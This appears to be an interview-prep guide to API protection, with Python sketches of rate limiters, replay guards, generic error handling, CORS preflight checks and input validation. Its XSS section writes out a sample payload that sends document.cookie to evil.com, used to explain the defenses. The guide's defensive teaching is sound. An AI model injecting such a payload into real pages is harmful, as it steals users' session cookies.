
Rate Limiting and Protection

TL;DR

Rate limiting caps requests per time window to enforce fairness (and rejects excess with 429). Throttling slows or queues excess requests to protect system stability. Use per-user, per-IP, and per-endpoint strategies. Beyond rate limiting, protect your API with secure error messages (never leak internals), replay attack prevention, CORS configuration, and input validation. Mentioning rate limiting in an interview signals production awareness.

The Nightclub Analogy

Imagine a popular nightclub with a capacity of 500 people.

Rate limiting is the bouncer at the door. "We've let in 500 people tonight. Sorry, you'll have to come back tomorrow." The bouncer rejects people who exceed the limit. Fair to everyone — first come, first served.

Throttling is more like a slow-moving queue. Instead of rejecting people outright, the nightclub lets people trickle in as others leave. "You're in the queue. You'll get in when there's space." The system slows down rather than cutting off.

Both exist to protect the system, but they work differently and solve different problems.

| | Rate Limiting | Throttling |
| --- | --- | --- |
| Purpose | Fairness: prevent any one user from hogging resources | Stability: prevent the system from being overwhelmed |
| What happens when limit is hit | Request is rejected (429 Too Many Requests) | Request is delayed/queued |
| Analogy | "Sorry, the nightclub is full. Come back tomorrow." | "You're in line. We'll let you in when there's room." |
| Protects against | Abusive users, scrapers, bots | Traffic spikes, cascading failures, flash crowds |
| Granularity | Per-user, per-IP, per-API-key | System-wide, per-service |

In practice, most production APIs implement both. Rate limiting on the edge (API gateway) for fairness, throttling internally (service mesh, load balancer) for stability.

[Figure: Token bucket rate limiting]


Rate Limiting Strategies

Not all requests are equal. A GET /events (read, cacheable, cheap) is very different from POST /bookings (write, transactional, expensive). Your rate limits should reflect this.

Per-User Rate Limiting

The most common strategy. Each authenticated user gets a quota:

Authenticated users: 1,000 requests per hour
Premium users: 10,000 requests per hour

The user is identified by their JWT (or API key). This prevents any single user from monopolizing your API while giving higher limits to paying customers.

Per-IP Rate Limiting

For unauthenticated endpoints (login, registration, public search):

Unauthenticated requests: 100 requests per hour per IP address

This catches brute-force attacks and scrapers that don't have API keys. But be careful — many users can share an IP address (corporate offices, university networks, mobile carriers using NAT). Rate limiting by IP alone can accidentally block legitimate users.

Per-Endpoint Rate Limiting

Some endpoints deserve tighter limits than others:

| Endpoint | Limit | Why |
| --- | --- | --- |
| GET /events | 1,000/hour | Read-only, cacheable, cheap |
| POST /bookings | 10/minute | Prevents ticket scalping bots |
| POST /login | 5/minute | Prevents brute-force password attacks |
| POST /payments | 3/minute | Expensive operation, fraud prevention |
| GET /search | 100/minute | Computationally expensive queries |

Per-Tenant Rate Limiting

In multi-tenant systems, you also rate-limit by tenant to prevent one tenant from degrading service for others:

Tenant (organization): 50,000 requests per hour
Individual user within tenant: 5,000 requests per hour

This creates a two-tier limit — the organization has a ceiling, and individual users within that organization have their own, smaller ceiling.
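
A minimal sketch of the two-tier check, assuming simple in-memory counters that are reset at each window boundary. The class name `TwoTierLimiter` and the IDs are hypothetical, and the demo uses tiny limits instead of the 50,000 and 5,000 figures so the behaviour is easy to see:

```python
from collections import defaultdict


class TwoTierLimiter:
    """Counts requests per tenant and per user within one time window."""

    def __init__(self, tenant_limit: int, user_limit: int) -> None:
        self.tenant_limit = tenant_limit
        self.user_limit = user_limit
        self.tenant_counts = defaultdict(int)
        self.user_counts = defaultdict(int)

    def allow(self, tenant_id: str, user_id: str) -> bool:
        user_key = (tenant_id, user_id)
        # Check both ceilings before consuming from either counter.
        if self.tenant_counts[tenant_id] >= self.tenant_limit:
            return False
        if self.user_counts[user_key] >= self.user_limit:
            return False
        self.tenant_counts[tenant_id] += 1
        self.user_counts[user_key] += 1
        return True

    def reset(self) -> None:
        """Call at each window boundary (hourly for the limits above)."""
        self.tenant_counts.clear()
        self.user_counts.clear()


# Hypothetical tiny limits: tenant ceiling 5, per-user ceiling 3.
limiter = TwoTierLimiter(tenant_limit=5, user_limit=3)
alice_served = sum(limiter.allow("acme", "alice") for _ in range(4))
bob_served = sum(limiter.allow("acme", "bob") for _ in range(3))
print(alice_served, bob_served)  # 3 2
```

Alice is stopped by her own ceiling, while Bob is stopped by the tenant ceiling even though he is under his personal limit.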


Rate Limiting Algorithms

When asked "how would you implement rate limiting?" in an interview, you should know the main algorithms and their trade-offs.

Token Bucket

Think of a bucket that holds tokens. Each request consumes one token. Tokens refill at a fixed rate. If the bucket is empty, requests are rejected.

Bucket capacity: 10 tokens
Refill rate: 1 token per second

Second 0:  Bucket has 10 tokens
           → 10 requests arrive → all served → bucket: 0
Second 1:  1 token refills → bucket: 1
           → 1 request arrives → served → bucket: 0
Second 6:  5 tokens have refilled since second 1 → bucket: 5
           → 8 requests arrive → 5 served, 3 rejected

Pros: Allows short bursts (up to bucket capacity), smooth refill. Cons: Slightly more complex to implement.

Used by: AWS API Gateway and Stripe, among many other production rate limiters.
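
The token bucket can be sketched in a few lines. This is an illustrative single-process version, not a production limiter: the class name `TokenBucket` is an assumption, and time is passed in explicitly so the behaviour is deterministic. The demo sends a burst of 10, one request a second later, then 8 requests five seconds after that:

```python
class TokenBucket:
    def __init__(self, capacity: float, refill_rate: float) -> None:
        self.capacity = capacity        # maximum tokens the bucket holds
        self.refill_rate = refill_rate  # tokens added per second
        self.tokens = capacity          # start with a full bucket
        self.last_refill = 0.0          # time of the last refill, in seconds

    def allow(self, now: float) -> bool:
        """Refill based on elapsed time, then try to consume one token."""
        elapsed = now - self.last_refill
        self.tokens = min(self.capacity, self.tokens + elapsed * self.refill_rate)
        self.last_refill = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


bucket = TokenBucket(capacity=10, refill_rate=1)
served_at_0 = sum(bucket.allow(now=0) for _ in range(10))  # full burst
served_at_1 = sum(bucket.allow(now=1) for _ in range(1))   # 1 token refilled
served_at_6 = sum(bucket.allow(now=6) for _ in range(8))   # 5 tokens refilled
print(served_at_0, served_at_1, served_at_6)  # 10 1 5
```

Refilling lazily on each call avoids a background timer; only two numbers per client need to be stored.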

Sliding Window

Count requests in a rolling time window. If a user made 100 requests in the last 60 minutes, they've hit their hourly limit.

Window: 60 minutes, rolling
Limit: 100 requests

12:00 → User makes 50 requests (50/100 used)
12:30 → User makes 40 requests (90/100 used)
12:45 → User makes 15 requests... 10 served, 5 rejected (100/100)
13:01 → The 50 requests from 12:00 fall out of the window → 50/100 used

Pros: Precise, no boundary issues. Cons: Requires storing timestamps for each request (memory-intensive).
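
A sliding window log can be sketched as a queue of timestamps. This is a single-process illustration under the assumption that time is supplied by the caller; the class name `SlidingWindowLog` is hypothetical. The demo uses minutes as the time unit to mirror a 60-minute window with a limit of 100:

```python
from collections import deque


class SlidingWindowLog:
    def __init__(self, limit: int, window: float) -> None:
        self.limit = limit
        self.window = window
        self.timestamps = deque()  # accepted request times, oldest first

    def _prune(self, now: float) -> None:
        # Drop requests that have aged out of the rolling window.
        while self.timestamps and self.timestamps[0] <= now - self.window:
            self.timestamps.popleft()

    def used(self, now: float) -> int:
        self._prune(now)
        return len(self.timestamps)

    def allow(self, now: float) -> bool:
        self._prune(now)
        if len(self.timestamps) < self.limit:
            self.timestamps.append(now)
            return True
        return False


log = SlidingWindowLog(limit=100, window=60)
served_1200 = sum(log.allow(now=0) for _ in range(50))
served_1230 = sum(log.allow(now=30) for _ in range(40))
served_1245 = sum(log.allow(now=45) for _ in range(15))
print(served_1200, served_1230, served_1245)  # 50 40 10
print(log.used(now=61))  # 50
```

The memory cost is visible here: one stored timestamp per accepted request, per client.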

Fixed Window

Simpler than sliding window. Count requests in fixed time intervals (e.g., every hour from :00 to :59).

Window: 12:00-12:59, Limit: 100

12:00 → requests start counting
12:55 → User has made 95 requests
12:59 → User makes 5 more → counter hits 100 → further requests rejected for the rest of the window
13:00 → Counter resets to 0 → user can make requests again

Pros: Simple, low memory. Cons: Boundary problem — a user could send 100 requests at 12:59 and 100 more at 13:00, effectively getting 200 requests in 2 minutes.
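
The boundary problem is easy to reproduce. The sketch below is a hypothetical single-process counter (the name `FixedWindowCounter` is an assumption) with a one-hour window expressed in seconds; it sends 100 requests in the last second of one window and 100 more in the first second of the next:

```python
class FixedWindowCounter:
    def __init__(self, limit: int, window_seconds: int) -> None:
        self.limit = limit
        self.window = window_seconds
        self.current_window = None  # index of the window being counted
        self.count = 0

    def allow(self, now: float) -> bool:
        window_id = int(now // self.window)
        if window_id != self.current_window:
            # A new window has started: reset the counter.
            self.current_window = window_id
            self.count = 0
        if self.count < self.limit:
            self.count += 1
            return True
        return False


counter = FixedWindowCounter(limit=100, window_seconds=3600)
before_boundary = sum(counter.allow(now=3599) for _ in range(100))
after_boundary = sum(counter.allow(now=3600) for _ in range(100))
print(before_boundary + after_boundary)  # 200
```

All 200 requests are accepted within two seconds, even though the nominal limit is 100 per hour.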

Algorithm Comparison

| Algorithm | Burst Handling | Memory | Precision | Boundary Issues |
| --- | --- | --- | --- | --- |
| Token Bucket | Allows controlled bursts | Low | Good | None |
| Sliding Window | Smooth, no bursts | High (stores timestamps) | Excellent | None |
| Fixed Window | None | Very low | Approximate | Yes: double rate at boundaries |

Interview Tip

"I'd use a token bucket algorithm implemented in Redis" is a great answer. It's the industry standard, handles bursts gracefully, and Redis provides the atomic operations needed for distributed rate limiting. Don't design the algorithm from scratch unless explicitly asked.


The 429 Response

When a client exceeds the rate limit, the API returns HTTP 429 Too Many Requests with helpful headers:

HTTP/1.1 429 Too Many Requests
Content-Type: application/json
Retry-After: 30
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 0
X-RateLimit-Reset: 1717024800

{
  "error": "Rate limit exceeded. Please retry after 30 seconds."
}

The headers tell the client:

| Header | Meaning | Example |
| --- | --- | --- |
| Retry-After | Seconds until the client can retry (an HTTP date is also allowed) | 30 |
| X-RateLimit-Limit | Maximum requests allowed in the window | 100 |
| X-RateLimit-Remaining | Requests remaining in the current window | 0 |
| X-RateLimit-Reset | Unix timestamp when the window resets | 1717024800 |

Good API clients read these headers and implement exponential backoff — waiting longer between retries instead of hammering the API.
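
A client-side retry loop might look like the sketch below. It is illustrative only: `send` is a hypothetical callable returning `(status, headers, body)`, the function names are assumptions, and `Retry-After` is assumed to be in its seconds form (an HTTP-date value would need separate parsing). When the server gives no hint, the delay doubles per attempt with random jitter:

```python
import random
import time


def backoff_delay(attempt, retry_after=None, base=1.0, cap=60.0):
    """Seconds to wait before the next try; `attempt` is 0-based."""
    if retry_after is not None:
        return float(retry_after)            # the server's hint wins
    ceiling = min(cap, base * 2 ** attempt)  # 1s, 2s, 4s, ... up to cap
    return random.uniform(0, ceiling)        # jitter spreads out retries


def call_with_retries(send, max_attempts=5, sleep=time.sleep):
    for attempt in range(max_attempts):
        status, headers, body = send()
        # Return on success, on any non-429 error, or when out of attempts.
        if status != 429 or attempt == max_attempts - 1:
            return status, body
        sleep(backoff_delay(attempt, headers.get("Retry-After")))


# Simulated server: two 429s, then success. Sleeps are recorded, not slept.
responses = iter([
    (429, {"Retry-After": "30"}, "slow down"),
    (429, {}, "slow down"),
    (200, {}, "ok"),
])
waits = []
result = call_with_retries(lambda: next(responses), sleep=waits.append)
print(result)  # (200, 'ok')
```

Passing `sleep` as a parameter keeps the loop testable without real delays.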


DDoS Protection

Rate limiting is your first line of defense against Distributed Denial of Service (DDoS) attacks, but it's not enough on its own. A real DDoS attack comes from thousands of IP addresses, so per-IP rate limiting won't stop it.

Defense in Depth

| Layer | Tool | What It Does |
| --- | --- | --- |
| Edge / CDN | Cloudflare, AWS CloudFront | Absorbs traffic at the network edge before it reaches your servers. Geographic distribution makes it hard to overwhelm. |
| WAF | AWS WAF, Cloudflare WAF | Web Application Firewall: pattern detection for malicious requests (SQL injection, XSS, known attack signatures). |
| API Gateway | Kong, AWS API Gateway | Rate limiting, authentication, request validation. First application-layer defense. |
| Application | Your code | Per-user rate limiting, business logic validation, input sanitization. |
| Infrastructure | AWS Shield, auto-scaling | Network-level DDoS mitigation, automatic scaling to absorb traffic spikes. |

The principle is defense in depth — multiple layers, each catching what the previous layer missed. No single layer is sufficient.


Replay Attack Prevention

A replay attack is when an attacker intercepts a valid request and sends it again. Imagine someone eavesdrops on your "transfer $100 to Alice" API call and replays it 50 times. You just lost $5,000.

How Replay Attacks Work

1. User sends: POST /transfer { "to": "alice", "amount": 100 }
   Authorization: Bearer eyJ...

2. Attacker intercepts this request (via network sniffing, proxy, etc.)

3. Attacker replays the exact same request 50 times
   → Server sees a valid JWT, valid request → processes all 50

Prevention Strategies

Short-lived tokens: JWTs with 15-minute expiration reduce the replay window. Even if captured, the token becomes useless quickly.

Nonces (number used once): Each request includes a unique random string. The server tracks nonces it's already seen and rejects duplicates.

POST /transfer
Authorization: Bearer eyJ...
X-Request-Nonce: a1b2c3d4e5f6
X-Request-Timestamp: 1717024000

Server:
  1. Is the timestamp within 5 minutes of server time? → Yes
  2. Have I seen nonce a1b2c3d4e5f6 before? → No → process
  3. Store nonce in Redis with 5-minute TTL

Replay:
  1. Is the timestamp within 5 minutes? → Maybe
  2. Have I seen this nonce? → YES → reject (409 Conflict)
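
The server-side check can be sketched as follows. This is an in-memory stand-in, with a dict playing the role of Redis keys with a TTL; the class name `ReplayGuard` and the return values are assumptions. Because this sketch accepts timestamps up to five minutes on either side of server time, it keeps each nonce until the request's timestamp can no longer pass the freshness check:

```python
import time


class ReplayGuard:
    def __init__(self, max_skew_seconds: int = 300) -> None:
        self.max_skew = max_skew_seconds
        self.seen = {}  # nonce -> expiry time (stand-in for Redis TTL keys)

    def check(self, nonce: str, timestamp: float, now: float = None) -> str:
        now = time.time() if now is None else now
        # Forget nonces whose retention period has passed.
        self.seen = {n: exp for n, exp in self.seen.items() if exp > now}
        if abs(now - timestamp) > self.max_skew:
            return "stale"    # timestamp too far from server time
        if nonce in self.seen:
            return "replay"   # already processed; the text suggests 409
        # Keep the nonce for as long as this timestamp stays acceptable.
        self.seen[nonce] = timestamp + self.max_skew
        return "ok"


guard = ReplayGuard()
first = guard.check("a1b2c3d4e5f6", 1717024000, now=1717024010)
second = guard.check("a1b2c3d4e5f6", 1717024000, now=1717024020)
late = guard.check("a1b2c3d4e5f6", 1717024000, now=1717024400)
print(first, second, late)  # ok replay stale
```

In a multi-server deployment the lookup and the store would need to be a single atomic operation in the shared store, which this sketch does not attempt.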

Idempotency keys: For payment and financial APIs, the client sends an Idempotency-Key header. The server stores the result of the first request and returns the same result for any duplicate key — without processing the transaction again.

POST /payments
Idempotency-Key: pay_abc123
{ "amount": 100, "to": "alice" }

First time: Process payment → return { "id": "txn_789", "status": "completed" }
Replay:     Lookup pay_abc123 → return same { "id": "txn_789", "status": "completed" }
            (payment is NOT processed again)

Stripe uses this pattern extensively. It's the gold standard for preventing duplicate transactions.
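
A toy version of the idempotency-key lookup, assuming an in-memory dict as the result store. `PaymentService` and its transaction IDs are hypothetical and this is not how any particular provider implements it:

```python
import itertools


class PaymentService:
    def __init__(self) -> None:
        self.results = {}   # idempotency key -> stored response
        self.processed = 0  # how many payments were actually executed
        self._ids = itertools.count(789)

    def create_payment(self, idempotency_key: str, amount: int, to: str) -> dict:
        # A known key returns the stored result without charging again.
        if idempotency_key in self.results:
            return self.results[idempotency_key]
        self.processed += 1  # stands in for the real money movement
        response = {"id": f"txn_{next(self._ids)}", "status": "completed"}
        self.results[idempotency_key] = response
        return response


service = PaymentService()
first = service.create_payment("pay_abc123", amount=100, to="alice")
replay = service.create_payment("pay_abc123", amount=100, to="alice")
print(first, replay == first, service.processed)
```

A real service would also need to make the check-and-store step atomic and decide how long keys are retained; both are outside this sketch.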


Security in Error Messages

This is a subtle but important security concern that separates junior from senior API design.

The Problem: Information Leakage

Consider a login endpoint. When authentication fails, what do you return?

Insecure:

{
  "error": "User alice@example.com not found"
}
or
{
  "error": "Wrong password for alice@example.com"
}

Why this is dangerous: An attacker can now enumerate valid email addresses. They try alice@example.com and get "wrong password" — now they know Alice has an account. They try bob@example.com and get "user not found" — Bob doesn't have an account. With a list of emails and an automated script, they can map out your entire user base.

Secure:

{
  "error": "Invalid credentials"
}

Same generic message whether the email doesn't exist, the password is wrong, or the account is locked. The attacker learns nothing.

The Rule: Generic Externally, Detailed Internally

| What the User Sees | What the Server Logs |
| --- | --- |
| "Invalid credentials" | "Login failed: user alice@example.com not found in database" |
| "Something went wrong" | "NullPointerException at PaymentService.java:142: missing tenant_id in JWT" |
| "Unable to process request" | "SQL timeout on query SELECT * FROM events WHERE venue_id = 456 (30s exceeded)" |

Never expose:

  • Stack traces
  • SQL queries or database errors
  • Internal IP addresses or service names
  • File paths on the server
  • Specific validation details that reveal system structure

Always return:

  • Generic, user-friendly error messages
  • Appropriate HTTP status codes (400, 401, 403, 404, 500)
  • A request ID for correlation ("request_id": "req_abc123") so support can look up detailed logs
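
The rule can be sketched with a toy login handler. Everything here is illustrative: the `USERS` dict holds a plaintext password only to keep the example short (a real system stores salted hashes), and the function name and request ID format are assumptions. Both failure paths log different details but return the same response shape:

```python
import hmac
import logging
import uuid

logger = logging.getLogger("auth")

# Hypothetical user store; plaintext is for illustration only.
USERS = {"alice@example.com": "correct horse"}


def login(email: str, password: str):
    request_id = f"req_{uuid.uuid4().hex[:12]}"
    stored = USERS.get(email)
    if stored is None:
        # Detailed reason goes to the logs only.
        logger.warning("Login failed: user %s not found (request_id=%s)",
                       email, request_id)
    elif not hmac.compare_digest(stored.encode(), password.encode()):
        logger.warning("Login failed: wrong password for %s (request_id=%s)",
                       email, request_id)
    else:
        return 200, {"request_id": request_id}
    # Same generic body for every failure, plus an ID for log correlation.
    return 401, {"error": "Invalid credentials", "request_id": request_id}


unknown_status, unknown_body = login("bob@example.com", "guess")
wrong_status, wrong_body = login("alice@example.com", "guess")
print(unknown_status, unknown_body["error"])
print(wrong_status, wrong_body["error"])
```

Response timing can still leak which branch was taken; closing that gap is beyond this sketch.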

Interview Tip

When designing error responses, mention that you'd return generic error messages to prevent information leakage, while logging detailed errors internally. It's a one-sentence comment that signals production awareness.


CORS — Cross-Origin Resource Sharing

CORS is a browser mechanism that lets a server selectively relax the same-origin policy, the rule that stops a website at evil.com from reading responses from yourbank.com using your cookies. It's not an API design choice; it's a browser restriction you need to configure correctly.

How CORS Works

When a browser makes a cross-origin request that is not a "simple" request (e.g., JavaScript on frontend.com sends a POST with an Authorization header to api.backend.com), the browser first sends a preflight request (an OPTIONS request) asking the server "is this allowed?"

Browser (frontend.com) → Server (api.backend.com):

OPTIONS /api/events HTTP/1.1
Origin: https://frontend.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: Authorization, Content-Type

Server → Browser:
HTTP/1.1 204 No Content
Access-Control-Allow-Origin: https://frontend.com
Access-Control-Allow-Methods: GET, POST, PUT, DELETE
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Max-Age: 86400

If the server's response allows the origin, method, and headers, the browser proceeds with the actual request. If not, the browser blocks it — the JavaScript code gets a CORS error.
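
On the server side, the preflight decision amounts to an allowlist lookup. The sketch below is framework-free and hypothetical (the function name and constants are assumptions); it returns the response headers for an OPTIONS request, or no CORS headers at all when the origin or method is not allowed:

```python
ALLOWED_ORIGINS = {"https://frontend.com"}
ALLOWED_METHODS = ["GET", "POST", "PUT", "DELETE"]
ALLOWED_HEADERS = ["Authorization", "Content-Type"]


def preflight_headers(origin: str, requested_method: str) -> dict:
    """Build CORS headers for a preflight, or {} to let the browser block it."""
    if origin not in ALLOWED_ORIGINS or requested_method not in ALLOWED_METHODS:
        return {}
    return {
        # Echo the specific origin rather than "*".
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Methods": ", ".join(ALLOWED_METHODS),
        "Access-Control-Allow-Headers": ", ".join(ALLOWED_HEADERS),
        "Access-Control-Max-Age": "86400",
        # The response differs per origin, so caches must key on it.
        "Vary": "Origin",
    }


allowed = preflight_headers("https://frontend.com", "POST")
blocked = preflight_headers("https://evil.com", "POST")
print(allowed["Access-Control-Allow-Origin"])  # https://frontend.com
print(blocked)  # {}
```

Most web frameworks ship CORS middleware that does this for you; the point here is only to show what that middleware decides.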

Key CORS Headers

| Header | What It Controls | Example |
| --- | --- | --- |
| Access-Control-Allow-Origin | Which origins can make requests | https://frontend.com (specific) or * (any origin; dangerous for authenticated APIs) |
| Access-Control-Allow-Methods | Which HTTP methods are allowed | GET, POST, PUT, DELETE |
| Access-Control-Allow-Headers | Which custom headers are allowed | Authorization, Content-Type |
| Access-Control-Allow-Credentials | Whether the browser may send credentials (cookies, HTTP authentication) with the request | true (required for credentialed requests) |
| Access-Control-Max-Age | How long to cache the preflight response | 86400 (24 hours) |

Common Mistakes

  • Using Access-Control-Allow-Origin: * with credentials. The browser rejects this combination. If requests carry credentials (cookies or HTTP authentication), you must return a specific allowed origin.
  • Forgetting the preflight. OPTIONS requests must return CORS headers. If your server doesn't handle OPTIONS, the browser blocks the actual request.
  • Overly permissive origins. Echoing back whatever Origin the request sends, combined with Access-Control-Allow-Credentials: true, means any website can make requests with your users' credentials.

Input Validation and Sanitization

Every piece of data from the client is untrusted. Even if your frontend validates input, an attacker can bypass the frontend and send raw HTTP requests. Server-side validation is mandatory.

What to Validate

| Check | What It Prevents | Example |
| --- | --- | --- |
| Type checking | Malformed data | Reject "age": "twenty" when expecting an integer |
| Range checking | Out-of-bounds values | Reject "quantity": -5 or "quantity": 999999 |
| Length limits | Buffer overflow, DoS | Reject names longer than 255 characters |
| Format validation | Invalid data | Reject "email": "not-an-email" |
| SQL injection prevention | Database attacks | Use parameterized queries, never string concatenation |
| XSS prevention | Cross-site scripting | Sanitize HTML/JS in user input before storing or rendering |
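
Several of these checks can be sketched with the standard library alone. The field names, the 1 to 10 quantity range, the `bookings` table, and the deliberately loose email pattern are all assumptions for illustration; the insert uses `sqlite3` placeholders rather than string concatenation:

```python
import re
import sqlite3

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")  # loose format check


def validate_booking(payload: dict) -> list:
    """Return the names of invalid fields; an empty list means valid."""
    errors = []
    name = payload.get("name")
    if not isinstance(name, str) or not 1 <= len(name) <= 255:
        errors.append("name")
    quantity = payload.get("quantity")
    # bool is a subclass of int in Python, so exclude it explicitly.
    if (not isinstance(quantity, int) or isinstance(quantity, bool)
            or not 1 <= quantity <= 10):
        errors.append("quantity")
    email = payload.get("email")
    if not isinstance(email, str) or not EMAIL_RE.match(email):
        errors.append("email")
    return errors


def save_booking(conn: sqlite3.Connection, payload: dict) -> None:
    # Placeholders keep user input out of the SQL text itself.
    conn.execute(
        "INSERT INTO bookings (name, quantity, email) VALUES (?, ?, ?)",
        (payload["name"], payload["quantity"], payload["email"]),
    )


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE bookings (name TEXT, quantity INTEGER, email TEXT)")

bad = {"name": "x" * 300, "quantity": -5, "email": "not-an-email"}
tricky = {"name": "x'); DROP TABLE bookings;--", "quantity": 2,
          "email": "alice@example.com"}
print(validate_booking(bad))     # ['name', 'quantity', 'email']
print(validate_booking(tricky))  # []
save_booking(conn, tricky)       # stored as plain text, nothing is dropped
stored_name = conn.execute("SELECT name FROM bookings").fetchone()[0]
```

The injection attempt passes validation as an odd but legal name, which is why parameterized queries are needed in addition to validation.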

XSS Prevention

Cross-Site Scripting (XSS) is when an attacker injects malicious JavaScript through user input that gets rendered in other users' browsers.

Attacker submits event name: <script>document.location='https://evil.com/?cookie='+document.cookie</script>

If stored and rendered without sanitization:
  → Every user who views this event has their cookies stolen

Prevention:

  • Sanitize on input: Strip or encode HTML tags from user input.
  • Escape on output: When rendering user-generated content, HTML-encode special characters (< → &lt;, > → &gt;).
  • Content-Security-Policy header: Tell the browser to only execute scripts from trusted sources.
  • HttpOnly cookies: Prevent JavaScript from accessing session cookies.
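
Escaping on output can be as small as one standard-library call. In the sketch below, `render_event_name` is a hypothetical helper; template engines with auto-escaping do the equivalent for you:

```python
import html


def render_event_name(name: str) -> str:
    # html.escape encodes &, <, > and (by default) both quote characters.
    return f"<h1>{html.escape(name)}</h1>"


malicious = "<script>document.location='https://evil.com/'</script>"
rendered = render_event_name(malicious)
print(rendered)
```

The browser displays the payload as text instead of executing it, because no `<script>` element survives in the markup.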

Putting It All Together: A Defense Checklist

When designing an API's security posture in an interview, here's what to cover:

| Layer | What to Mention |
| --- | --- |
| Authentication | "JWT-based auth with RS256 signing" |
| Authorization | "RBAC with roles: customer, manager, admin. User identity from JWT." |
| Multi-tenancy | "Tenant ID in JWT, all queries scoped by tenant" |
| Rate limiting | "Token bucket at the API gateway: 1000 req/hr per user, stricter limits on write endpoints" |
| Error handling | "Generic error messages externally, detailed logging internally" |
| Input validation | "Server-side validation on all inputs, parameterized queries" |
| CORS | "Restrict origins to our frontend domains" |
| Transport | "HTTPS everywhere, no HTTP" |

You don't need to deep-dive into every layer unless asked. Mentioning rate limiting and secure error messages is usually enough to signal production awareness. The interviewer will probe deeper if they want more detail.

Interview Tip

Rate limiting is the single most impactful security topic to mention in a system design interview. Saying "I'd add rate limiting at the API gateway — 1000 requests per hour per user, with tighter limits on booking and payment endpoints" takes 5 seconds and immediately signals that you've thought about production traffic patterns. Don't design the rate limiting algorithm unless asked.


Quick Recap

  • Rate limiting caps requests per time window and rejects excess (429). It enforces fairness.
  • Throttling slows or queues excess requests to protect system stability. Different from rate limiting.
  • Rate limit by user, IP, endpoint, and tenant. Not all endpoints deserve the same limits.
  • Token bucket is the industry-standard algorithm. Implemented in Redis for distributed systems.
  • 429 Too Many Requests with Retry-After and X-RateLimit-* headers tells clients when to retry.
  • DDoS protection requires defense in depth: CDN, WAF, API gateway, application logic.
  • Replay attacks are prevented with nonces, timestamps, short-lived tokens, and idempotency keys.
  • Error messages must be generic externally ("Invalid credentials") and detailed internally (logs). Never leak stack traces, SQL, or internal IPs.
  • CORS must be configured correctly — don't use * with credentials.
  • Validate all input server-side. The frontend is not a security boundary.

Interview Expectations: Junior vs. Senior

  • Junior/Mid-level: Mentions rate limiting to stop abuse. Might casually say "store limits in a database" without considering the latency impact.
  • Senior/Staff: Places rate limiting at the API Gateway or edge level using fast, in-memory datastores (Redis). Chooses the right algorithm (Token Bucket vs Fixed Window) based on whether burst traffic should be allowed or strictly smoothed. Mentions returning standard 429 Too Many Requests status codes with Retry-After headers.